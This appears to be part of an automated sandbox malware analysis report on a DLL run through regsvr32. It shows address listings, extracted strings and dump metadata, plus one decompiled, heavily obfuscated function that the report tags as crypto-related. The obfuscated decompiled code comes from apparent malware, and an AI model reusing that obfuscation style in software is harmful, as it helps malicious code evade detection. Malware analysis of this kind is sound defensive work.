0x1000a91d
0x1000a928
0x1000a930
0x1000a934
0x1000a93c
0x1000a944
0x1000a94c
0x1000a957
0x1000a962
0x1000a96d
0x1000a975
0x1000a97a
0x1000a982
0x1000a98a
0x1000a992
0x1000a99f
0x1000a9a2
0x1000a9a6
0x1000a9ae
0x1000a9b3
0x1000a9bb
0x1000a9ce
0x1000a9d5
0x1000a9e0
0x1000a9eb
0x1000a9f6
0x1000aa01
0x1000aa09
0x1000aa14
0x1000aa1c
0x1000aa21
0x1000aa29
0x1000aa31
0x1000aa39
0x1000aa46
0x1000aa4a
0x1000aa52
0x1000aa5a
0x1000aa62
0x1000aa6a
0x1000aa6f
0x1000aa77
0x1000aa7f
0x1000aa92
0x1000aa99
0x1000aaa4
0x1000aaaf
0x1000aab7
0x1000aac2
0x1000aad2
0x1000aad6
0x1000aae2
0x1000aae5
0x1000aae9
0x1000aaf1
0x1000ab08
0x1000ab0b
0x1000ab12
0x1000ab1d
0x1000ab28
0x1000ab30
0x1000ab3b
0x1000ab46
0x1000ab51
0x1000ab5c
0x1000ab6c
0x1000ab70
0x1000ab78
0x1000ab7d
0x1000ab85
0x1000ab8d
0x1000ab95
0x1000ab9d
0x1000aba2
0x1000abaa
0x1000abb2
0x1000abba
0x1000abbf
0x1000abc7
0x1000abcf
0x1000abda
0x1000abe5
0x1000abf0
0x1000abfb
0x1000ac03
0x1000ac0e
0x1000ac16
0x1000ac1e
0x1000ac26
0x1000ac2e
0x1000ac33
0x1000ac3c
0x1000ac3f
0x1000ac43
0x1000ac4b
0x1000ac56
0x1000ac61
0x1000ac6c
0x1000ac73
0x1000ac7a
0x1000ac7a
0x1000ac7e
0x1000ac83
0x1000ac83
0x1000ac88
0x1000ac88
0x1000ac88
0x1000ac8e
0x00000000
0x00000000
0x1000ac94
0x1000ac94
0x1000ad7a
0x1000ad8d
0x1000ad94
0x1000ad98
0x1000ad9d
0x1000ac88
0x1000ac88
0x1000ac88
0x1000ac8e
0x00000000
0x00000000
0x00000000
0x1000ac8e
0x00000000
0x1000ac88
0x1000aca0
0x1000ad60
0x1000ad67
0x1000ac7a
0x1000ac7a
0x1000ac7e
0x1000ac83
0x00000000
0x1000ac83
0x1000ac7a
0x1000acac
0x1000acf1
0x1000acf7
0x1000acfb
0x1000ad2c
0x1000ad31
0x1000ad34
0x1000ad3f
0x1000ad44
0x00000000
0x1000ad44
0x1000acb4
0x1000acea
0x00000000
0x1000acea
0x1000acb8
0x1000acd6
0x1000acdd
0x1000ace4
0x1000ace5
0x1000ac7a
0x1000ac7a
0x1000ac7e
0x00000000
0x1000ac7e
0x1000ac7a
0x1000acc0
0x1000b063
0x1000b069
0x1000b08f
0x1000b098
0x1000b098
0x1000b06b
0x00000000
0x1000b06b
0x1000acc6
0x00000000
0x1000ada5
0x1000adab
0x1000b04d
0x1000b054
0x1000b059
0x1000b059
0x1000b05e
0x00000000
0x1000b05e
0x1000adb3
0x1000ae96
0x1000aec7
0x1000ae98
0x1000ae98
0x1000aea4
0x1000aeab
0x1000aeb6
0x1000aebb
0x1000aebe
0x1000aebe
0x1000af10
0x1000af14
0x1000af16
0x1000af18
0x1000af18
0x1000af55
0x1000af68
0x1000af79
0x1000af7e
0x1000af83
0x1000b032
0x1000af89
0x1000af95
0x1000afb5
0x1000afba
0x1000afbf
0x1000afe9
0x1000affb
0x1000b020
0x1000b025
0x1000b025
0x1000b028
0x1000b028
0x1000ac7a
0x1000ac7a
0x1000ac7e
0x00000000
0x1000ac7e
0x1000ac7a
0x1000adbf
0x1000b085
0x00000000
0x1000b08b
0x1000adcb
0x1000ae37
0x1000ae3e
0x1000ae42
0x1000ae49
0x1000ae44
0x1000ae44
0x1000ae44
0x1000ae4b
0x1000ae6f
0x1000ae74
0x1000ae79
0x1000ae81
0x00000000
0x1000ae81
0x1000add3
0x00000000
0x00000000
0x1000add9
0x1000addd
0x1000ade4
0x1000adee
0x1000adf5
0x1000ae10
0x1000ae27
0x1000ae2a
0x1000ae2f
0x00000000
0x1000ae2f
0x1000ac88
0x1000ac83

Strings

a, xrefs: 1000A796
g/dw, xrefs: 1000ABB2
4^T?, xrefs: 1000AA6F
m, xrefs: 1000A912
E+, xrefs: 1000A1B0
e=, xrefs: 1000A5EC
)f, xrefs: 1000A98A
M~U, xrefs: 1000A94C
h3, xrefs: 1000A201
so, xrefs: 1000A5AE
G~, xrefs: 1000A2D1
/=, xrefs: 1000A2A5
</=, xrefs: 1000A292
WT, xrefs: 1000AC1E
0Ot, xrefs: 1000A344
_t6, xrefs: 1000A4F7
`Kv, xrefs: 1000A8A4
$!, xrefs: 1000AB46
GSc, xrefs: 1000A2C6

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $!$)f$/=$0Ot$4^T?$</=$E+$G~$M~U$WT$_t6$`Kv$a$e=$g/dw$h3$so$GSc$m
API String ID: 0-109303157
Opcode ID: b848d1d70321ea5388f0e481d2aef9fb2b293ac1ff446dcef260739353aec312
Instruction ID: 5941169d84a64871e12169f96fedee99c695cf8d43bba06df57be39ec6d8cbff
Opcode Fuzzy Hash: b848d1d70321ea5388f0e481d2aef9fb2b293ac1ff446dcef260739353aec312
Instruction Fuzzy Hash: EB8201715093818FD3B9CF20D54AA8BBBE1FBD4744F108A1DE5DA96260DBB58948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001F24C Relevance: 18.2, Strings: 14, Instructions: 696
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1001F24C(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				signed int _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				intOrPtr _v2628;
				char _v2632;
				intOrPtr _v2636;
				char _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				signed int _v2936;
				signed int _v2940;
				signed int _v2944;
				signed int _v2948;
				signed int _v2952;
				void* _t814;
				void* _t815;
				signed int _t821;
				signed int _t835;
				signed int _t849;
				void* _t851;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t860;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t959;
				signed int _t961;
				void* _t966;
				void* _t967;
				void* _t974;

				_v2612 = _v2612 & 0x00000000;
				_v2608 = _v2608 & 0x00000000;
				_v2620 = 0x7a74b0;
				_v2616 = 0x246381;
				_v2952 = 0xe5bda1;
				_v2952 = _v2952 * 0x72;
				_t966 = __ecx;
				_t961 = 0xcc43ff;
				_t853 = 0x39;
				_v2952 = _v2952 * 0x30;
				_v2952 = _v2952 + 0x5b69;
				_v2952 = _v2952 ^ 0x2eb5ace0;
				_v2700 = 0xbf1c2b;
				_v2700 = _v2700 * 0x15;
				_v2700 = _v2700 ^ 0x0fbd4f87;
				_v2948 = 0x231916;
				_v2948 = _v2948 * 0x3a;
				_v2948 = _v2948 + 0xffff12f4;
				_v2948 = _v2948 ^ 0x07f2c1f0;
				_v2880 = 0x826617;
				_v2880 = _v2880 >> 4;
				_v2880 = _v2880 >> 3;
				_v2880 = _v2880 ^ 0x400514da;
				_v2880 = _v2880 ^ 0x40041016;
				_v2776 = 0x44668d;
				_v2776 = _v2776 << 0xd;
				_v2776 = _v2776 + 0x9b62;
				_v2776 = _v2776 ^ 0x8cd23b62;
				_v2924 = 0xd4065a;
				_v2924 = _v2924 + 0xd1f1;
				_v2924 = _v2924 + 0xffffbe5a;
				_v2924 = _v2924 >> 9;
				_v2924 = _v2924 ^ 0x00006a4b;
				_v2840 = 0xdfe2ae;
				_v2840 = _v2840 / _t853;
				_v2840 = _v2840 << 9;
				_v2840 = _v2840 ^ 0x07df0b1f;
				_v2940 = 0x6971f0;
				_v2940 = _v2940 >> 0xb;
				_v2940 = _v2940 ^ 0x7e1a035d;
				_t854 = 0xc;
				_v2940 = _v2940 / _t854;
				_v2940 = _v2940 ^ 0x0a8fbe5f;
				_v2744 = 0xd33cf6;
				_t855 = 0x52;
				_v2744 = _v2744 * 0x6a;
				_v2744 = _v2744 + 0x5b6e;
				_v2744 = _v2744 ^ 0x57788e75;
				_v2796 = 0xde6b00;
				_v2796 = _v2796 + 0x5412;
				_v2796 = _v2796 / _t855;
				_v2796 = _v2796 ^ 0x0007d6ff;
				_v2764 = 0xd748df;
				_v2764 = _v2764 >> 9;
				_v2764 = _v2764 ^ 0x93993a17;
				_v2764 = _v2764 ^ 0x9399bf19;
				_v2804 = 0xd8e367;
				_v2804 = _v2804 ^ 0x784177c8;
				_t856 = 0x7f;
				_v2804 = _v2804 / _t856;
				_v2804 = _v2804 ^ 0x00f15177;
				_v2856 = 0x89f4b4;
				_v2856 = _v2856 | 0xb6f8984d;
				_v2856 = _v2856 << 5;
				_v2856 = _v2856 ^ 0xdf3aac16;
				_v2724 = 0xb27f1;
				_v2724 = _v2724 << 0xb;
				_v2724 = _v2724 ^ 0x593c7aba;
				_v2748 = 0xf72266;
				_v2748 = _v2748 + 0xd461;
				_v2748 = _v2748 | 0x3fee39f8;
				_v2748 = _v2748 ^ 0x3ff54066;
				_v2664 = 0xc1c12f;
				_v2664 = _v2664 ^ 0xd5754688;
				_v2664 = _v2664 ^ 0xd5bd1592;
				_v2944 = 0x5aa167;
				_v2944 = _v2944 >> 0xc;
				_t857 = 0x31;
				_t959 = 0x7c;
				_v2944 = _v2944 * 0x7f;
				_v2944 = _v2944 | 0x64c96e52;
				_v2944 = _v2944 ^ 0x64c2be3c;
				_v2676 = 0xe4c8df;
				_v2676 = _v2676 * 0x1e;
				_v2676 = _v2676 ^ 0x1acee1b8;
				_v2904 = 0xf7b852;
				_v2904 = _v2904 >> 0xd;
				_v2904 = _v2904 + 0x223e;
				_v2904 = _v2904 << 0xf;
				_v2904 = _v2904 ^ 0x14f42ef1;
				_v2648 = 0x5b220f;
				_v2648 = _v2648 + 0xffff92f6;
				_v2648 = _v2648 ^ 0x005bcc39;
				_v2712 = 0x200dd;
				_v2712 = _v2712 | 0xfcc1bf18;
				_v2712 = _v2712 ^ 0xfcc749a6;
				_v2936 = 0x1d394f;
				_v2936 = _v2936 + 0xffff3cdd;
				_v2936 = _v2936 * 0xd;
				_v2936 = _v2936 / _t857;
				_v2936 = _v2936 ^ 0x000a92e3;
				_v2732 = 0x95df8d;
				_v2732 = _v2732 << 5;
				_t858 = 0x66;
				_v2732 = _v2732 * 0x7f;
				_v2732 = _v2732 ^ 0x4b38d3f6;
				_v2848 = 0x4ba28d;
				_v2848 = _v2848 + 0xb1db;
				_v2848 = _v2848 ^ 0x7600d506;
				_v2848 = _v2848 ^ 0x7647fd9a;
				_v2740 = 0x584341;
				_v2740 = _v2740 | 0xd6f33f70;
				_v2740 = _v2740 * 0x52;
				_v2740 = _v2740 ^ 0xdc8f2ea4;
				_v2928 = 0xc2f770;
				_v2928 = _v2928 ^ 0x474ea8b4;
				_v2928 = _v2928 / _t959;
				_v2928 = _v2928 / _t858;
				_v2928 = _v2928 ^ 0x000f4023;
				_v2828 = 0x8a7d29;
				_v2828 = _v2828 >> 5;
				_v2828 = _v2828 ^ 0x472882c3;
				_v2828 = _v2828 ^ 0x472bd946;
				_v2780 = 0xeb3712;
				_v2780 = _v2780 << 0xf;
				_v2780 = _v2780 | 0xa7e27ba2;
				_v2780 = _v2780 ^ 0xbfee82df;
				_v2836 = 0xe00d71;
				_v2836 = _v2836 << 7;
				_t859 = 0x37;
				_v2836 = _v2836 / _t859;
				_v2836 = _v2836 ^ 0x020d4922;
				_v2752 = 0xc44df0;
				_v2752 = _v2752 ^ 0x99186e6f;
				_v2752 = _v2752 ^ 0xfbbb9d03;
				_v2752 = _v2752 ^ 0x6268d079;
				_v2888 = 0x665e91;
				_v2888 = _v2888 | 0xe8fbf7bb;
				_v2888 = _v2888 / _t959;
				_v2888 = _v2888 ^ 0x01ef036c;
				_v2820 = 0xf61880;
				_v2820 = _v2820 + 0xee06;
				_v2820 = _v2820 ^ 0x3dbc2b26;
				_v2820 = _v2820 ^ 0x3d457c8b;
				_v2920 = 0x6aebd2;
				_t860 = 0x34;
				_v2920 = _v2920 * 0x56;
				_v2920 = _v2920 << 0xc;
				_v2920 = _v2920 + 0x2a0e;
				_v2920 = _v2920 ^ 0xb386378c;
				_v2756 = 0x362fa0;
				_v2756 = _v2756 / _t860;
				_v2756 = _v2756 ^ 0x58b341e7;
				_v2756 = _v2756 ^ 0x58bb8608;
				_v2736 = 0x2e2ab2;
				_v2736 = _v2736 | 0x50dbb944;
				_v2736 = _v2736 >> 3;
				_v2736 = _v2736 ^ 0x0a15db61;
				_v2812 = 0x1f7116;
				_v2812 = _v2812 << 1;
				_t861 = 0x6a;
				_v2812 = _v2812 * 0x57;
				_v2812 = _v2812 ^ 0x1554f032;
				_v2704 = 0xe62c14;
				_v2704 = _v2704 + 0x45c6;
				_v2704 = _v2704 ^ 0x00e23280;
				_v2772 = 0xf3e519;
				_v2772 = _v2772 + 0xffffa648;
				_v2772 = _v2772 / _t861;
				_v2772 = _v2772 ^ 0x000cc9bf;
				_v2644 = 0x8ebbcd;
				_v2644 = _v2644 ^ 0x37354828;
				_v2644 = _v2644 ^ 0x37b48ab4;
				_v2892 = 0x1c04fc;
				_v2892 = _v2892 + 0xffffc1fd;
				_v2892 = _v2892 * 0x3c;
				_v2892 = _v2892 | 0x788b178a;
				_v2892 = _v2892 ^ 0x7e869f1c;
				_v2708 = 0xd5182f;
				_v2708 = _v2708 + 0x9f4e;
				_v2708 = _v2708 ^ 0x00d7bae7;
				_v2716 = 0x273ba;
				_v2716 = _v2716 << 1;
				_v2716 = _v2716 ^ 0x000e33f3;
				_v2720 = 0xfc17f0;
				_v2720 = _v2720 << 0xb;
				_v2720 = _v2720 ^ 0xe0becc94;
				_v2860 = 0xb1c805;
				_t862 = 0x65;
				_v2860 = _v2860 / _t862;
				_v2860 = _v2860 ^ 0x7d3bd5d4;
				_v2860 = _v2860 ^ 0x7d3f4c1c;
				_v2876 = 0x9f8257;
				_v2876 = _v2876 << 7;
				_t863 = 0x4f;
				_v2876 = _v2876 / _t863;
				_t864 = 0x6e;
				_v2876 = _v2876 / _t864;
				_v2876 = _v2876 ^ 0x00086f63;
				_v2868 = 0x247890;
				_v2868 = _v2868 | 0x97c6d739;
				_v2868 = _v2868 >> 8;
				_v2868 = _v2868 ^ 0x009c6857;
				_v2692 = 0xe46059;
				_v2692 = _v2692 + 0x5b19;
				_v2692 = _v2692 ^ 0x00e8129c;
				_v2760 = 0xbec167;
				_v2760 = _v2760 + 0xae30;
				_t865 = 0x72;
				_v2760 = _v2760 / _t865;
				_v2760 = _v2760 ^ 0x000603e7;
				_v2884 = 0xcea6d;
				_v2884 = _v2884 ^ 0x7b1d2ce0;
				_v2884 = _v2884 | 0x16feba5b;
				_t866 = 0x15;
				_v2884 = _v2884 / _t866;
				_v2884 = _v2884 ^ 0x0614b91a;
				_v2768 = 0xa53f1f;
				_v2768 = _v2768 | 0x60cdd998;
				_t867 = 0x75;
				_v2768 = _v2768 / _t867;
				_v2768 = _v2768 ^ 0x00d149ba;
				_v2688 = 0x3b8641;
				_v2688 = _v2688 ^ 0x64fdccdf;
				_v2688 = _v2688 ^ 0x64cc5f73;
				_v2872 = 0xd9863b;
				_v2872 = _v2872 << 0xe;
				_t868 = 0x76;
				_v2872 = _v2872 * 0x23;
				_v2872 = _v2872 ^ 0x56838e25;
				_v2844 = 0x6627b6;
				_v2844 = _v2844 | 0xd54345f5;
				_v2844 = _v2844 / _t868;
				_v2844 = _v2844 ^ 0x01cd3af9;
				_v2656 = 0x7aa70b;
				_v2656 = _v2656 << 6;
				_v2656 = _v2656 ^ 0x1ea1419a;
				_v2896 = 0xb31e07;
				_t869 = 0x28;
				_v2896 = _v2896 * 0x6d;
				_v2896 = _v2896 * 0x68;
				_v2896 = _v2896 / _t869;
				_v2896 = _v2896 ^ 0x064486bb;
				_v2824 = 0xbbb2c9;
				_v2824 = _v2824 >> 4;
				_v2824 = _v2824 + 0xfffff480;
				_v2824 = _v2824 ^ 0x000fd34c;
				_v2660 = 0xa1baf0;
				_v2660 = _v2660 * 0x35;
				_v2660 = _v2660 ^ 0x2179e8a3;
				_v2908 = 0x86d7c3;
				_v2908 = _v2908 >> 6;
				_v2908 = _v2908 << 3;
				_v2908 = _v2908 + 0xffffafed;
				_v2908 = _v2908 ^ 0x001f9432;
				_v2832 = 0x6e06b3;
				_v2832 = _v2832 + 0x339;
				_v2832 = _v2832 + 0xffff9ef3;
				_v2832 = _v2832 ^ 0x00601167;
				_v2680 = 0x7b8540;
				_v2680 = _v2680 + 0xffffc416;
				_v2680 = _v2680 ^ 0x007acaf8;
				_v2800 = 0x4f9f38;
				_v2800 = _v2800 ^ 0x11d8e941;
				_v2800 = _v2800 + 0xffff5554;
				_v2800 = _v2800 ^ 0x1193d529;
				_v2808 = 0xf50265;
				_v2808 = _v2808 * 5;
				_v2808 = _v2808 ^ 0xe7900145;
				_v2808 = _v2808 ^ 0xe35c7d88;
				_v2816 = 0x24fb9d;
				_v2816 = _v2816 >> 0xa;
				_v2816 = _v2816 ^ 0x749cd4bc;
				_v2816 = _v2816 ^ 0x7492664d;
				_v2792 = 0x5a2a43;
				_v2792 = _v2792 * 0x19;
				_v2792 = _v2792 >> 3;
				_v2792 = _v2792 ^ 0x01194957;
				_v2652 = 0x21b62c;
				_v2652 = _v2652 << 0xe;
				_v2652 = _v2652 ^ 0x6d8eec22;
				_v2900 = 0xe0eb37;
				_v2900 = _v2900 + 0x7d95;
				_v2900 = _v2900 ^ 0xf4f0bfbe;
				_v2900 = _v2900 | 0xaf19f260;
				_v2900 = _v2900 ^ 0xff1968a7;
				_v2916 = 0xe959ef;
				_t544 =  &_v2916; // 0xe959ef
				_v2916 =  *_t544 * 0x68;
				_t546 =  &_v2916; // 0xe959ef
				_v2916 =  *_t546 * 0x1e;
				_v2916 = _v2916 + 0xfffff04a;
				_v2916 = _v2916 ^ 0x1bf7da90;
				_v2668 = 0x262f57;
				_v2668 = _v2668 << 0xd;
				_v2668 = _v2668 ^ 0xc5ece10a;
				_v2696 = 0x8953b4;
				_v2696 = _v2696 >> 5;
				_v2696 = _v2696 ^ 0x000431f0;
				_v2788 = 0x15867c;
				_v2788 = _v2788 | 0x5b46c0af;
				_v2788 = _v2788 + 0xffff6b0c;
				_v2788 = _v2788 ^ 0x5b569666;
				_v2932 = 0x3116b3;
				_v2932 = _v2932 + 0xffff698f;
				_v2932 = _v2932 + 0xffff2577;
				_v2932 = _v2932 << 0xe;
				_v2932 = _v2932 ^ 0xe96f4d18;
				_v2672 = 0xd3938a;
				_t870 = 0x22;
				_v2672 = _v2672 / _t870;
				_v2672 = _v2672 ^ 0x000b25f7;
				_v2784 = 0x2f89ce;
				_v2784 = _v2784 ^ 0x55d1e11c;
				_v2784 = _v2784 + 0x25d8;
				_v2784 = _v2784 ^ 0x55f9cd50;
				_v2864 = 0xfcd9f4;
				_t871 = 0x30;
				_v2864 = _v2864 / _t871;
				_v2864 = _v2864 << 0x10;
				_v2864 = _v2864 ^ 0x448e8f04;
				_v2912 = 0xf85074;
				_v2912 = _v2912 << 6;
				_t872 = 0xf;
				_v2912 = _v2912 * 0x7b;
				_v2912 = _v2912 * 0x38;
				_v2912 = _v2912 ^ 0x4d236d3d;
				_v2728 = 0x9c2ca3;
				_v2728 = _v2728 + 0xffff703a;
				_v2728 = _v2728 ^ 0x00937b5c;
				_v2852 = 0x2fcf18;
				_v2852 = _v2852 / _t872;
				_v2852 = _v2852 ^ 0x404f4941;
				_v2852 = _v2852 ^ 0x4043f2c5;
				_v2684 = 0x9680c0;
				_t873 = 0x61;
				_v2684 = _v2684 / _t873;
				_v2684 = _v2684 ^ 0x00006586;
				_t814 = E1001E034(_t873);
				_t960 = _v2728;
				_t851 = _t814;
				while(1) {
					L1:
					_t815 = 0xdcb0784;
					do {
						while(1) {
							L2:
							_t974 = _t961 - 0x65fb172;
							if(_t974 > 0) {
								break;
							}
							if(_t974 == 0) {
								_push(_v2932);
								_push(_v2788);
								_push(_v2696);
								_push(0);
								_push( &_v1044);
								_push(_v2668);
								_push(1);
								_push(_v2924);
								E100163F0(_v2916, 0, __eflags);
								_t967 = _t967 + 0x20;
								_t961 = 0x76cdd15;
								while(1) {
									L1:
									_t815 = 0xdcb0784;
									goto L2;
								}
							}
							if(_t961 == 0xcc43ff) {
								E100166C2(_v2940,  &_v524, _v2744, _v2948, _v2940, _v2940, _v2952, _v2796, _v2764, _v2804);
								_t967 = _t967 + 0x20;
								_t961 = 0x28cc224;
								while(1) {
									L1:
									_t815 = 0xdcb0784;
									goto L2;
								}
							}
							if(_t961 == 0x206408d) {
								_t835 = E100151E8(_v2656, _v2896, _v2640, _v2636);
								_t960 = _t835;
								__eflags = _t835;
								_t815 = 0xdcb0784;
								_t961 =  !=  ? 0xdcb0784 : 0x310e3aa;
								continue;
							}
							if(_t961 == 0x2853cf9) {
								return E1001E373(_v2728, _v2632, _v2852, _v2684);
							}
							if(_t961 != 0x28cc224) {
								if(_t961 != 0x310e3aa) {
									goto L25;
								} else {
									E10006A8D(_v2864, _v2912, _v2640);
									_t961 = 0x2853cf9;
									while(1) {
										L1:
										_t815 = 0xdcb0784;
										goto L2;
									}
								}
							}
							E10009574(_v2856,  &_v2084, _v2724, _v2748);
							 *((short*)(E1000FFDE(_v2664, _v2944,  &_v2084, _v2676) + _v2880 * 2)) = 0;
							E1000B200(_v2904, _v2648, __eflags, _v2712,  &_v1564, _v2936);
							_push(_v2928);
							_push(_v2740);
							_push(_v2848);
							E1001734A(_v2828, __eflags, _v2780, _v2836, _v2752,  &_v2604, E10004BB4(E10001834, _v2732), _v2888, E10001834,  &_v2084);
							E1000B9D7(_v2820, _v2920, _t843, _v2756);
							_t849 = E10009B80(_v2736, _v2812, _v2704,  &_v2604, _v2772, _t966);
							_t967 = _t967 + 0x64;
							__eflags = _t849;
							if(__eflags != 0) {
								_t961 = 0x6cef5d7;
								while(1) {
									L1:
									_t815 = 0xdcb0784;
									goto L2;
								}
							}
							return _t849;
							L29:
						}
						__eflags = _t961 - 0x6cef5d7;
						if(_t961 == 0x6cef5d7) {
							_v2628 = E1000578C();
							_v2624 = 2 + E1001ADE9(_v2892, _v2708, _v2716, _v2720, _t817) * 2;
							_t821 = E1000D7A6(_v2860, _v2876, _t851, _v2868, _v2692, _v2700, _v2760, _t851, _v2892, _v2884, _t851, _v2768,  &_v2632, _v2776);
							_t967 = _t967 + 0x3c;
							__eflags = _t821;
							if(__eflags == 0) {
								_t961 = 0x219b577;
								_t815 = 0xdcb0784;
								goto L25;
							} else {
								_t961 = 0xeaa59c7;
								goto L1;
							}
						} else {
							__eflags = _t961 - 0x76cdd15;
							if(_t961 == 0x76cdd15) {
								E10006A8D(_v2672, _v2784, _t960);
								_t961 = 0x310e3aa;
								while(1) {
									L1:
									_t815 = 0xdcb0784;
									goto L2;
								}
							} else {
								__eflags = _t961 - _t815;
								if(_t961 == _t815) {
									_push(_v2832);
									_push(_v2908);
									_push(_v2660);
									E10011BED(_v2800, __eflags,  &_v524,  &_v1044, _t960, 0x10001884, E10004BB4(0x10001884, _v2824), _v2808, _v2816,  &_v2604);
									E1000B9D7(_v2792, _v2652, _t823, _v2900);
									_t967 = _t967 + 0x34;
									_t961 = 0x65fb172;
									while(1) {
										L1:
										_t815 = 0xdcb0784;
										goto L2;
									}
								} else {
									__eflags = _t961 - 0xeaa59c7;
									if(_t961 != 0xeaa59c7) {
										goto L25;
									} else {
										E1000F784( &_v2640, _v2872,  &_v2632, _v2844);
										_t967 = _t967 + 0xc;
										asm("sbb esi, esi");
										_t961 = (_t961 & 0xff810394) + 0x2853cf9;
										while(1) {
											L1:
											_t815 = 0xdcb0784;
											goto L2;
										}
									}
								}
							}
						}
						goto L29;
						L25:
						__eflags = _t961 - 0x219b577;
					} while (__eflags != 0);
					return _t815;
				}
			}

0x1001f252
0x1001f25c
0x1001f264
0x1001f26f
0x1001f27a
0x1001f28b
0x1001f28f
0x1001f296
0x1001f29d
0x1001f2a0
0x1001f2a4
0x1001f2ac
0x1001f2b4
0x1001f2c7
0x1001f2ce
0x1001f2d9
0x1001f2e6
0x1001f2ea
0x1001f2fa
0x1001f302
0x1001f30a
0x1001f30f
0x1001f314
0x1001f31c
0x1001f324
0x1001f32f
0x1001f337
0x1001f342
0x1001f34d
0x1001f355
0x1001f35d
0x1001f365
0x1001f36a
0x1001f372
0x1001f388
0x1001f38f
0x1001f397
0x1001f3a2
0x1001f3aa
0x1001f3af
0x1001f3bb
0x1001f3c0
0x1001f3c6
0x1001f3ce
0x1001f3e1
0x1001f3e2
0x1001f3e9
0x1001f3f4
0x1001f3ff
0x1001f40a
0x1001f41e
0x1001f425
0x1001f430
0x1001f43b
0x1001f443
0x1001f44e
0x1001f459
0x1001f464
0x1001f47a
0x1001f47f
0x1001f488
0x1001f493
0x1001f49b
0x1001f4a3
0x1001f4a8
0x1001f4b0
0x1001f4bb
0x1001f4c3
0x1001f4ce
0x1001f4d9
0x1001f4e4
0x1001f4ef
0x1001f4fa
0x1001f505
0x1001f510
0x1001f51b
0x1001f523
0x1001f52d
0x1001f530
0x1001f533
0x1001f537
0x1001f53f
0x1001f547
0x1001f55a
0x1001f561
0x1001f56c
0x1001f574
0x1001f579
0x1001f581
0x1001f586
0x1001f58e
0x1001f599
0x1001f5a4
0x1001f5af
0x1001f5ba
0x1001f5c5
0x1001f5d0
0x1001f5d8
0x1001f5e5
0x1001f5f1
0x1001f5f5
0x1001f5fd
0x1001f608
0x1001f618
0x1001f619
0x1001f620
0x1001f62b
0x1001f633
0x1001f63b
0x1001f643
0x1001f64b
0x1001f656
0x1001f669
0x1001f670
0x1001f67b
0x1001f683
0x1001f693
0x1001f69d
0x1001f6a1
0x1001f6ab
0x1001f6b6
0x1001f6be
0x1001f6c9
0x1001f6d4
0x1001f6df
0x1001f6e7
0x1001f6f2
0x1001f6fd
0x1001f708
0x1001f719
0x1001f71e
0x1001f725
0x1001f730
0x1001f73b
0x1001f746
0x1001f751
0x1001f75c
0x1001f764
0x1001f774
0x1001f77a
0x1001f782
0x1001f78d
0x1001f798
0x1001f7a3
0x1001f7ae
0x1001f7bb
0x1001f7be
0x1001f7c2
0x1001f7c7
0x1001f7cf
0x1001f7d7
0x1001f7ed
0x1001f7f4
0x1001f7ff
0x1001f80a
0x1001f815
0x1001f820
0x1001f828
0x1001f833
0x1001f83e
0x1001f84d
0x1001f84e
0x1001f855
0x1001f860
0x1001f86b
0x1001f876
0x1001f881
0x1001f88c
0x1001f8a0
0x1001f8a7
0x1001f8b2
0x1001f8bd
0x1001f8c8
0x1001f8d3
0x1001f8db
0x1001f8e8
0x1001f8ec
0x1001f8f4
0x1001f8fc
0x1001f907
0x1001f912
0x1001f91d
0x1001f92a
0x1001f931
0x1001f93c
0x1001f947
0x1001f94f
0x1001f95a
0x1001f968
0x1001f96d
0x1001f973
0x1001f97b
0x1001f983
0x1001f98b
0x1001f994
0x1001f999
0x1001f9a3
0x1001f9a8
0x1001f9ae
0x1001f9b6
0x1001f9be
0x1001f9c6
0x1001f9cb
0x1001f9d3
0x1001f9de
0x1001f9e9
0x1001f9f4
0x1001f9ff
0x1001fa11
0x1001fa16
0x1001fa1f
0x1001fa2a
0x1001fa32
0x1001fa3a
0x1001fa46
0x1001fa4b
0x1001fa51
0x1001fa59
0x1001fa64
0x1001fa76
0x1001fa7b
0x1001fa84
0x1001fa8f
0x1001fa9a
0x1001faa5
0x1001fab0
0x1001fab8
0x1001fac2
0x1001fac3
0x1001fac7
0x1001facf
0x1001fada
0x1001faee
0x1001faf5
0x1001fb02
0x1001fb0d
0x1001fb15
0x1001fb20
